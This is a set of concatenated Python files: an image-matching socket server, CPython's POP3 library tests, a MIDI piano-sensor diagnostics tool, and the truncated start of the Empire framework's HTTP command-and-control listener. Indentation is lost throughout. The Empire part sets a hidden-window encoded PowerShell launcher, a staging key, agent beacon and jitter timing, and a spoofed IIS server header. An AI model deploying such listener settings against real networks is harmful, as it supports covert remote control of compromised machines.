self.__call__(timeout=timeout)
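# Minimal usage sketch (assumes a POSIX system, since the class uses
# os.setsid): run a command with retries and a per-attempt timeout, printing
# the captured stdout lines or the raised CommandException.
if __name__ == "__main__":
    try:
        lines = Command.run_command(['echo', 'hello'], repeat=2, timeout=2)
        print(lines)
    except Command.CommandException as error:
        print(error)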
# EOF
|
mar_server.py
|
import socket, time, sys, struct, os
import cv2, pickle, threading
import numpy as np
from flask import request, url_for
from flask_api import FlaskAPI, status, exceptions
from os import listdir
from os.path import isfile, join
HOST = '0.0.0.0'
USER_PORT = 9001
REST_PORT = 10001
BUFFER_SIZE = 256
SIZE = 100 # number of comparing images
SOCKET_TIME_OUT = 10
INFOS = [0.1]
FOLDER = 'images/'
CWD = os.getcwd()
server = FlaskAPI(__name__)
@server.route("/", methods=['GET'])
def function():
global INFOS
useful_len = int(len(INFOS)*0.2) # last 80%
avg_data = np.mean(INFOS[useful_len:]) # get average
INFOS = [INFOS[-1]] # reset the data
return str(avg_data), status.HTTP_200_OK
def recv_image_from_socket(client):
start_time = time.time() # time when recv starts
buffers = b''
while len(buffers)<4:
try:
buf = client.recv(4-len(buffers))
except:
return False
buffers += buf
# if recv takes too long, consider this user disconnected
if time.time() - start_time >= SOCKET_TIME_OUT:
return False
size, = struct.unpack('!i', buffers)
#print "receiving %d bytes" % size
recv_data = b''
while len(recv_data) < size:
try:
data = client.recv(1024)
except:
return False
recv_data += data
# if recv takes too long, consider this user disconnected
if time.time() - start_time >= SOCKET_TIME_OUT:
return False
frame_data = recv_data[:size]
imgdata = np.frombuffer(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
return decimg
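# Hedged client-side sketch matching the length-prefixed protocol that
# recv_image_from_socket() expects: a 4-byte big-endian length ('!i') followed
# by the JPEG-encoded frame. The socket and image path are supplied by the
# caller; the path used here is hypothetical.
def example_send_image(sock, image_path='frame.jpg'):
    img = cv2.imread(image_path)
    ok, encoded = cv2.imencode('.jpg', img)
    if not ok:
        return False
    payload = encoded.tobytes()
    sock.sendall(struct.pack('!i', len(payload)) + payload)
    return True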
def process(feature_extractor, matcher, image, database):
latent = feature_extractor.inference(image)
obj_id = sub_process_matching(latent, database, matcher)
return obj_id
class ORB:
def __init__(self,):
# Initiate ORB detector
self.orb = cv2.ORB_create()
# the default edgeThreshold is 31, which cannot detect keypoints
# on small cropped images;
# reducing this value allows ORB to work on small images
def inference(self, img):
# find the keypoints with ORB
kp = self.orb.detect(img, None)
# compute the descriptors with ORB
kp, des = self.orb.compute(img, kp)
if des is None:
# if no features are detected, randomly generate 100 features.
des = np.random.randint(0, 100, (100, 32), dtype=np.uint8)
des = des[:100] # max number of features
return des
def sub_process_matching(features, database, matcher):
# given extracted ORB features, find the corresponding object in the database
# by matching descriptors and keeping the entry with the smallest average
# match distance; the key of that entry is returned as the object id.
obj_id, min_aug_dist = 0, 1e9
for key, latent in database.items():
# where latent vector could be just a vector or a multi-vector due to orb detection
matches = matcher.match(latent, features) # store the latent dist
avg_distance = np.mean([match.distance for match in matches])
if avg_distance <= min_aug_dist:  # keep the smallest average match distance
min_aug_dist = avg_distance
obj_id = key
return obj_id
def start_rest_api():
server.run(host=HOST,port=REST_PORT)
print('completed!')
if __name__ == "__main__":
if len(sys.argv) == 1:
max_img_numbers = 100
elif len(sys.argv) == 2:
max_img_numbers = int(sys.argv[1])
else:
raise ValueError
# start rest api server
t1 = threading.Thread(target = start_rest_api)
t1.setDaemon(True)
t1.start()
# bind to port to accept client
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((HOST,USER_PORT))
s.listen(10)
# init some objects
feature_extractor = ORB()
matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
# global_database = {}
# # get all images
# images = [cv2.imread(FOLDER+f) for f in listdir(FOLDER) if isfile(join(FOLDER, f))]
# # save to global images
# for i, img in enumerate(images):
# latent = feature_extractor.inference(img)
# global_database[str(i)] = latent
# with open('global_database.pkl', 'wb') as handler:
# pickle.dump(global_database, handler)
#### handle different folders #####
try:
with open(CWD+'/global_database.pkl', 'rb') as handler:
global_database = pickle.load(handler)
except: pass
try:
with open(CWD+'/offloading_servers/global_database.pkl', 'rb') as handler:
global_database = pickle.load(handler)
except: pass
try:
with open(CWD+'offloading_servers/global_database.pkl', 'rb') as handler:
global_database = pickle.load(handler)
except: pass
try:
with open('global_database.pkl', 'rb') as handler:
global_database = pickle.load(handler)
except: pass
database = {}
for key, val in global_database.items():
database[key] = val # get the value
if len(database)>=max_img_numbers: break
print('database length is ', len(database)) # if no global_database loaded, then report error
# main loop for all incoming client
while True:
print("waiting for client connection...")
client, addr = s.accept() # accept client
print ("Get new user socket")
StartTime = time.time()
# if client connected, keeping processing its data
while True:
decimg = recv_image_from_socket(client) # receive from client
if decimg is False:
print("client droped, break, waiting other clients")
break
ProcessTime = time.time()
match_id = process(feature_extractor, matcher, decimg, database) # process the img
latency = int(1000*(time.time() - StartTime))/1000 # ms level
print(latency, end=' ', flush=True) # print result
time.sleep(1) # sleep for 1 second and clean the radio channel buffer in case
INFOS.append(latency) # record info, latency
StartTime = time.time() # reset start time
str1 = str(match_id) + '\n' # prepare data
client.sendall(str1.encode()) # send back to client
client.close()
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import errno
from unittest import TestCase, skipUnless
from test import support as test_support
threading = test_support.import_module('threading')
HOST = test_support.HOST
PORT = 0
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "pycacert.pem")
requires_ssl = skipUnless(SUPPORTS_SSL, 'SSL not supported')
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: postmaster@python.org\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
CAPAS = {'UIDL': [], 'IMPLEMENTATION': ['python-testlib-pop-server']}
enable_UTF8 = False
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = False
self.tls_starting = False
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' % (arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
def cmd_quit(self, arg):
self.push('+OK closing.')
self.close_when_done()
def _get_capas(self):
_capas = dict(self.CAPAS)
if not self.tls_active and SUPPORTS_SSL:
_capas['STLS'] = []
return _capas
def cmd_capa(self, arg):
self.push('+OK Capability list follows')
if self._get_capas():
for cap, params in self._get_capas().items():
_ln = [cap]
if params:
_ln.extend(params)
self.push(' '.join(_ln))
self.push('.')
def cmd_utf8(self, arg):
self.push('+OK I know RFC6856'
if self.enable_UTF8
else '-ERR What is UTF8?!')
if SUPPORTS_SSL:
def cmd_stls(self, arg):
if self.tls_active is False:
self.push('+OK Begin TLS negotiation')
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
tls_sock = context.wrap_socket(self.socket,
server_side=True,
do_handshake_on_connect=False,
suppress_ragged_eofs=False)
self.del_channel()
self.set_socket(tls_sock)
self.tls_active = True
self.tls_starting = True
self.in_buffer = []
self._do_tls_handshake()
else:
self.push('-ERR Command not permitted when TLS active')
def _do_tls_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self.tls_active = True
self.tls_starting = False
def handle_read(self):
if self.tls_starting:
self._do_tls_handshake()
else:
try:
asynchat.async_chat.handle_read(self)
except ssl.SSLEOFError:
self.handle_close()
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port, timeout=3)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_too_long_lines(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd,
'echo +%s' % ((poplib._MAXLINE + 10) * 'a'))
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
def test_apop(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
def test_utf8_raises_if_unsupported(self):
self.server.handler.enable_UTF8 = False
self.assertRaises(poplib.error_proto, self.client.utf8)
def test_utf8(self):
self.server.handler.enable_UTF8 = True
expected = b'+OK I know RFC6856'
result = self.client.utf8()
self.assertEqual(result, expected)
def test_capa(self):
capa = self.client.capa()
self.assertTrue('IMPLEMENTATION' in capa.keys())
def test_quit(self):
resp = self.client.quit()
self.assertTrue(resp)
self.assertIsNone(self.client.sock)
self.assertIsNone(self.client.file)
@requires_ssl
def test_stls_capa(self):
capa = self.client.capa()
self.assertTrue('STLS' in capa.keys())
@requires_ssl
def test_stls(self):
expected = b'+OK Begin TLS negotiation'
resp = self.client.stls()
self.assertEqual(resp, expected)
@requires_ssl
def test_stls_context(self):
expected = b'+OK Begin TLS negotiation'
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CAFILE)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.check_hostname = True
with self.assertRaises(ssl.CertificateError):
resp = self.client.stls(context=ctx)
self.client = poplib.POP3("localhost", self.server.port, timeout=3)
resp = self.client.stls(context=ctx)
self.assertEqual(resp, expected)
if SUPPORTS_SSL:
from test.test_ftplib import SSLConnection
class DummyPOP3_SSLHandler(SSLConnection, DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.secure_connection()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = True
self.tls_starting = False
@requires_ssl
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse('STLS' in capa.keys())
@requires_ssl
class TestPOP3_TLSClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3.stls()
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port, timeout=3)
self.client.stls()
def tearDown(self):
if self.client.file is not None and self.client.sock is not None:
try:
self.client.quit()
except poplib.error_proto:
# happens in the test_too_long_lines case; the overlong
# response will be treated as response to QUIT and raise
# this exception
self.client.close()
self.server.stop()
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse(b'STLS' in capa.keys())
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = test_support.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def server(self, evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except socket.timeout:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def testTimeoutNone(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(pop.sock.gettimeout())
pop.sock.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=30)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def test_main():
tests = [TestPOP3Class, TestTimeouts,
TestPOP3_SSLClass, TestPOP3_TLSClass]
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
__init__.py
|
#!/usr/bin/env python3
import mido
from mido import Message, MidiFile, MidiTrack
from dissect.cstruct import cstruct
import threading
import time
import sys
import bz2
import statistics
from collections import defaultdict
pico_in = mido.get_input_names()[1] # NOQA -- I like this indentation better
pico_out = mido.get_output_names()[1]
c=cstruct()
with open('../RaspberryPiPico/My_MIDI_constants.h') as f:
c.load(f.read())
midi_strings = c.consts
midi_values = {}
for k in midi_strings.keys():
value = midi_strings[k]
if value in midi_values:
print("Warning, duplicated value", value, "for", midi_values[value], "and", k, file=sys.stderr)
midi_values[midi_strings[k]] = k
print(midi_strings)
print(midi_values)
class mt:
def _previous_not_NA(self, mylist):
previous = "N/A"
i = 0
while (previous == "N/A"):
i = i + 1
previous = mylist[-i] if (len(mylist) > i - 1) else 0
return previous
def _count_missing(self, all_packets):
n_missing_packets = all_packets.count("N/A")
n_present_packets = len(all_packets) - n_missing_packets
return n_missing_packets, n_present_packets
def parse_stats(self, filename, quiet=False):
adc_packets = defaultdict(lambda: list())
rtc_packets = []
n_junk_packets = 0
iter_per_ms = defaultdict(lambda: list())
n_overflow_iter_per_ms = defaultdict(lambda: 0)
roundtrip_time = []
notes_on = defaultdict(lambda: 0)
velocities_on = defaultdict(lambda: 0)
notes_off = defaultdict(lambda: 0)
velocities_off = defaultdict(lambda: 0)
if not quiet: print() # NOQA -- simple and clear enough
previous_packet = None # Check if ADC and RTC packets alternate
for msg in MidiFile(file=bz2.open(filename, 'rb')).play():
if msg.type == 'note_on':
notes_on[msg.note] += 1
velocities_on[msg.note] += msg.velocity
continue
if msg.type == 'note_off':
notes_off[msg.note] += 1
velocities_off[msg.note] += msg.velocity
continue
if msg.type != 'sysex':
print("Warning, not dealing with", msg.type, file=sys.stderr)
continue
try:
if msg.data[0] != defined.MIDI_VENDOR:
print("Warning, probable message corruption", msg, file=sys.stderr)
continue
if msg.data[1] > defined.MIDI_MAX_ADC_VALUE:
if msg.data[1] == defined.MIDI_RTC:
curr_time = (msg.data[2] * 128 + msg.data[3]) / 1000000  # 14-bit µs counter converted to seconds
old_time = self._previous_not_NA(rtc_packets)
while (curr_time < old_time):
curr_time += 16384 / 1000000  # unwrap: the counter rolls over every 16384 µs
rtc_packets.append(curr_time)
if previous_packet == defined.MIDI_RTC:
# TODO make sure N_ADC packets not just one
for key in adc_packets:
adc_packets[key].append("N/A")
previous_packet = defined.MIDI_RTC
elif msg.data[1] == defined.MIDI_ITER_PER_MS:
if msg.data[2] == msg.data[3] and msg.data[2] == 127:
n_junk_packets += 1
continue
if msg.data[3] == 127:
n_overflow_iter_per_ms[msg.data[2]] += 1
continue
iter_per_ms[msg.data[2]].append(msg.data[3])
elif msg.data[1] == defined.MIDI_ROUNDTRIP_TIME_uS:
roundtrip_time.append(msg.data[2] * 128 + msg.data[3])
# MIDI_REGULATE
# MIDI_CONTINUE_REGULATION
# MIDI_DUMP_REGULATION
# INIT_PICO
# MIDI_NO_SUCH_NOTE
# MIDI_ERROR
# TOO_MANY_PICOS
# EXPECTING_INIT
# TOO_MANY_PACKETS
else:
print("Warning, not counting ", end="", file=sys.stderr)
self.pretty_print(msg.data, target=sys.stderr)
else:
if previous_packet == defined.MIDI_MAX_ADC_VALUE:
# TODO count up to N_ADC packets to save b/w
rtc_packets.append("N/A")
adc_packets[msg.data[3]].append(msg.data[1] * 128 + msg.data[2])
previous_packet = defined.MIDI_MAX_ADC_VALUE
except IndexError:
print("Warning, corrupted packet ", end="", file=sys.stderr)
self.pretty_print(msg.data, target=sys.stderr)
if not quiet:
n_adc_missing_packets = 0
n_adc_present_packets = 0
for i in adc_packets:
miss, pres = self._count_missing(adc_packets[i])
n_adc_missing_packets += miss
n_adc_present_packets += pres
n_rtc_missing_packets, n_rtc_present_packets = self._count_missing(rtc_packets)
print()
print("Number of ADC dump packets", n_adc_present_packets)
print("Number of known ADC missing packets", n_adc_missing_packets)
print("Number of MIDI_RTC packets", n_rtc_present_packets)
print("Number of known MIDI_RTC missing packets", n_rtc_missing_packets)
print("Number of startup packets", n_junk_packets)
for pico in iter_per_ms:
if len(iter_per_ms[pico]) > 0:
avg = statistics.mean(iter_per_ms[pico])
std = statistics.stdev(iter_per_ms[pico])
else:
avg = "N/A"
std = "N/A"
print("ITER_PER_MS for pico #", pico, " avg:", avg, "stdev:", std, "(over", len(iter_per_ms[pico]), "messages)")
if len(iter_per_ms) == 0:
print("No ITER_PER_MS packets")
for pico in n_overflow_iter_per_ms:
print("Number of overflow ITER_PER_MS packets for pico #", pico, "is", n_overflow_iter_per_ms[pico])
if len(roundtrip_time) > 0:
avg = statistics.mean(roundtrip_time)
std = statistics.stdev(roundtrip_time)
else:
avg = "N/A"
std = "N/A"
print("MIDI_ROUNDTRIP_TIME_uS. avg:", avg, "stdev:", std, "(over", len(roundtrip_time), "messages)")
print("NOTE_ON", dict(notes_on))
for v in velocities_on:
velocities_on[v] /= notes_on[v]
print("VELOCITY_ON", dict(velocities_on))
print("NOTE_OFF", dict(notes_off))
for v in velocities_off:
velocities_off[v] /= notes_off[v]
print("VELOCITY_OFF", dict(velocities_off))
return rtc_packets, adc_packets
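# Illustrative sketch (not part of the original tool): the sysex data bytes above are
# 7-bit, so parse_stats() reconstructs 14-bit values as hi*128+lo and unwraps the RTC
# counter, which rolls over every 16384 µs. This standalone helper mirrors that
# arithmetic with assumed inputs; it is not called anywhere in this module.
def _decode_rtc_seconds(self, hi, lo, previous_seconds):
    seconds = (hi * 128 + lo) / 1000000   # 0..16383 µs expressed in seconds
    while seconds < previous_seconds:     # counter wrapped at least once
        seconds += 16384 / 1000000
    return seconds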
def pretty_print(self, data, exclude=[], target=sys.stdout):
my_midi_strings = list(midi_strings.keys())
for e in exclude:
my_midi_strings.remove(e)
if data[1] in midi_values:
if midi_values[data[1]] in my_midi_strings:
print(midi_values[data[1]], data[2], data[3], file=target)
else:
print(data[1], data[2], data[3], file=target)
def _print_info(self):
print("Run `mt.save_captured(file)` to stop capturing and save.")
print("Run `mt.abort_capture()` to stop capturing.")
def __init__(self):
self.th = None
self.term = None
self.outport = mido.open_output(pico_out)
print("Opened", pico_out, "for output", file=sys.stderr)
self.must_stop = True
self.mid = None
self.track = None
def _print_above(self, stuff):
try:
if self.term is None:
import blessed
self.term = blessed.Terminal()
with self.term.location(self.term.width - len(stuff) - 1, 0):
print(stuff, end=None)
except ModuleNotFoundError:
pass
def _capture(self, pico):
with mido.open_input(pico) as inport:
print(pico, "opened, collecting messages.", file=sys.stderr)
self._print_info()
last_time = 0
options = ["|", "/", "-", "\\"]
i = 0
self._print_above(options[i])
for msg in inport:
self.track.append(msg)
curr_time = time.time()
if (curr_time - last_time > .25):
i = (i+1) % len(options)
self._print_above(options[i]) # TODO print MIDI housekeeping
last_time = curr_time
if self.must_stop:
break
print("Capture stopped")
def abort_capture(self):
self.must_stop = True
print("Waiting for last packet to quit")
self.th.join()
def capture(self, pico=pico_in):
self.mid = MidiFile()
self.must_stop = False
self.track = MidiTrack()
self.mid.tracks.append(self.track)
self.th = threading.Thread(target=mt._capture, args=(self, pico) ) # NOQA space makes it clearer
self.th.start()
time.sleep(1) # let the _print_above win the race condition against the prompt
def save_captured(self, filename):
if type(filename) != str:
raise ValueError("first argument must be a string")
self.must_stop = True
self.mid.save(filename)
print("File saved, waiting for last packet")
self.th.join()
def adc_dump(self, note):
if (self.must_stop):
print("Dumping but not capturing")
print("Run `mt.capture()` to capture.")
self.outport.send(Message('sysex', data=(
defined.MIDI_VENDOR,
defined.MIDI_DUMP_NOTE_ADC,
note,
0, 0, 0)))
def stop_adc_dump(self):
self.outport.send(Message('sysex', data=(
defined.MIDI_VENDOR,
defined.MIDI_STOP_DUMP_ADC,
0, 0, 0, 0)))
if (not self.must_stop):
print("Stopped dumpting but still capturing")
self._print_info()
def _validate_integer(self, a):
if a < 0 or a > 4095:
raise ValueError("Let off, Strike and Drop must be 0-4095")
if a != int(a):
raise ValueError("Let off, Strike and Drop must be integers")
def _validate_float(self, a):
if a < 0 or a > 255:
raise ValueError("Velocities must be 0-255")
def _int_regulation_with(self, a, verbose):
first = int(a / 127)
second = a % 127
self.outport.send(Message('sysex', data=(
defined.MIDI_VENDOR,
defined.MIDI_CONTINUE_REGULATION,
first,
second,
0, 0)))
if verbose:
print("Regulating with",
"0x{:02x}".format(first),
"0x{:02x}".format(second),
"==", first, second)
def _float_regulation_with(self, a, verbose):
first = int(a)
second = int( (a - int(a)) * 100 ) # NOQA spaces make it clearer
self.outport.send(Message('sysex', data=(
defined.MIDI_VENDOR,
defined.MIDI_CONTINUE_REGULATION,
first,
second,
0, 0)))
if verbose:
print("Regulating with",
"0x{:02x}".format(first),
"0x{:02x}".format(second),
"==", first, second)
def regulate(self, note, let_off=0, strike=0, drop=0,
vel_const=0, vel_slope=0, verbose=True):
self._validate_integer(let_off)
self._validate_integer(strike)
self._validate_integer(drop)
self._validate_float(vel_const)
self._validate_float(vel_slope)
self.outport.send(Message('sysex', data=(
defined.MIDI_VENDOR,
defined.MIDI_REGULATE,
note,
0, 0, 0)))
self._int_regulation_with(let_off, verbose)
self._int_regulation_with(strike, verbose)
self._int_regulation_with(drop, verbose)
self._float_regulation_with(vel_const, verbose)
self._float_regulation_with(vel_slope, verbose)
self._int_regulation_with(let_off, verbose) # dummy to close the regulation
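# Illustrative sketch (not part of the original tool): the regulation values above are
# squeezed into two 7-bit-safe MIDI data bytes. Integers are split as
# (value // 127, value % 127); floats as (integer part, hundredths). The decoders below
# show how a receiver would reassemble them, assuming the firmware uses the matching
# scheme; they are not used elsewhere in this module.
def _decode_int_regulation(first, second):
    return first * 127 + second

def _decode_float_regulation(first, second):
    return first + second / 100

assert _decode_int_regulation(4095 // 127, 4095 % 127) == 4095
assert abs(_decode_float_regulation(3, 14) - 3.14) < 1e-9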
|
http.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from werkzeug.serving import WSGIRequestHandler
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import obfuscation
from lib.common import packets
from lib.common import templating
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
